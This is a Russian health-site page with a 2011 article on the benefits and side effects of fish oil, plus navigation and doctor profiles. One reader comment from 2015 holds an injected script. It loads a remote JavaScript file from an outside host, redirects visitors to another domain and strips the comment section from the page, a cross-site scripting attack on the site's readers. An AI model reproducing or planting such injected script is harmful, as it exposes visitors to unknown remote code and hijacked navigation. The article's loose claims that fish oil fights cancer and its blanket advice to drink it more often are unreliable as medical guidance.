Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Противный? Зато полезный!  >>  Противный? Зато полезный!
 
Обратная связь
 

Противный? Зато полезный!

Размер шрифта
27 сентября 2011 09:00
  • google_analytics: false
  • Нравится

Жители северных стран, где моря богаты жирной рыбой, реже сталкиваются с инфарктом. Причина в рыбьем жире.

1

В России рыбий жир воспринимают как лекарство детское, но во многих зарубежных странах рыбий жир знают как мощнейшее профилактическое и общеукрепляющее средство для всех возрастов. В США рыбий жир зарегистрирован как лекарство.

Добывают рыбий жир из печени трески, которая на 75% состоит из жира. Кстати, рыбий жир можно назвать традиционным российским продуктом – поморы изготавливали его еще сотни лет назад. В чем же секрет рыбьего жира, почему он так полезен для здоровья?

  1. В рыбьем жире много Омега-3 жирных кислот. Они снижают воспаление, риск рака толстой кишки, способствуют профилактике сердечно-сосудистых заболеваний. Омега-3 жирные кислоты также благотворно влияют на психику, помогают избавиться от депрессии.

  2. Витамин D – еще один важный компонент рыбьего жира. Он полезен для укрепления костей, препятствует росту раковых клеток. Особенно важно употреблять рыбий жир тем, кто живет на севере. Без витамина D кальций не усваивается, а значит, кости становятся хрупкими. Если солнца мало, то и витамина D организм недополучает, а это приводит к рахиту. Вывод – чаще пейте рыбий жир.

  3. Есть у рыбьего жира и побочные эффекты. В нем много витамина А, причем в таком объеме, что заработать гипервитаминоз (передозировку витамина) проще простого. Большие дозы рыбьего жира плохо влияют на здоровье беременных женщин. Так что принимать его лучше строго по предписаниям врача.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:07

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Чем закусывать, чтобы не сойти с ума   Супербитва: миндаль против грецкого ореха! Кто лучше?   Как провести новогодние праздники без изжоги и похмелья!   Посмотрите в свою тарелку! От еды зависит, будет у вас маразм или нет  
22 февраля 2012Омега-3 уменьшают риск заболеваний сердца у детей 26 сентября 2011Доказано, что рыба спасает от инсульта
 
22 мая 2013Дай курильщику лосось – спаси его от рака! 27 февраля 2013Бурый жир поможет похудеть
 

Слайдшоу

1
Еда для хорошего настроения в менопаузе Еда на зиму
Супереда с омега-3 жирными кислотами Зачем есть рыбу?
Продукты для яркой сексуальной жизни Еда, которая улучшит любое настроение
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.